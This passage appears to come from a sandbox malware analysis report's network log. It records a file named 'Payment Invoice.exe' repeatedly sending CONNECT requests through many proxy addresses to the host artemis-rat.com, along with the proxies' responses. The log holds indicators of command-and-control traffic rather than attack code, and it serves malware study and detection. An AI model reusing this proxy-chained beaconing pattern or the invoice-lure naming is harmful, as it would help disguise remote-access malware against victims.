                                                                Mar 11, 2024 16:15:22.786256075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.589512110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                316192.168.2.45103067.213.210.118587037076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.394104004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.794797897 CET24INHTTP/1.1 200 #string


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                317192.168.2.451041162.159.246.135807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.416385889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.577725887 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                318192.168.2.45102872.195.114.16941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.416769981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                319192.168.2.45093647.93.121.200807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.417020082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.757409096 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                Mar 11, 2024 16:15:15.759804010 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                320192.168.2.450910106.14.255.124807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.417242050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.767635107 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.20.1
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                321192.168.2.451036194.4.50.91123347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.420342922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                322192.168.2.451046185.162.229.70807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.423516035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.577794075 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                323192.168.2.45090149.228.131.16950007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.425147057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                324192.168.2.451011185.49.31.20780817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.455602884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                325192.168.2.45099620.33.5.2788887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.461005926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.130583048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.339869976 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                326192.168.2.45102643.129.228.4678917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.461390972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                327192.168.2.451108138.68.60.831287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.461750984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.039848089 CET28INHTTP/1.1 400 Bad Request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                328192.168.2.450316142.54.237.3441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.461941004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                329192.168.2.45004767.43.228.25339337076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.471174002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.511251926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.512243032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.527065039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.405693054 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                330192.168.2.45106466.45.246.19488887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.475928068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                331192.168.2.45105672.10.160.170268877076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.476180077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                332192.168.2.451122104.16.224.33807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.484272003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.638762951 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                333192.168.2.451129162.159.242.10807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.492388964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.653234005 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                334192.168.2.451096184.181.217.21041457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.524032116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                335192.168.2.45103343.133.136.20888007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.528191090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                336192.168.2.449990159.223.71.71592437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.530261040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.621244907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.621577978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.714541912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                337192.168.2.451147138.68.235.51807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.543006897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.995434999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.505693913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.524189949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
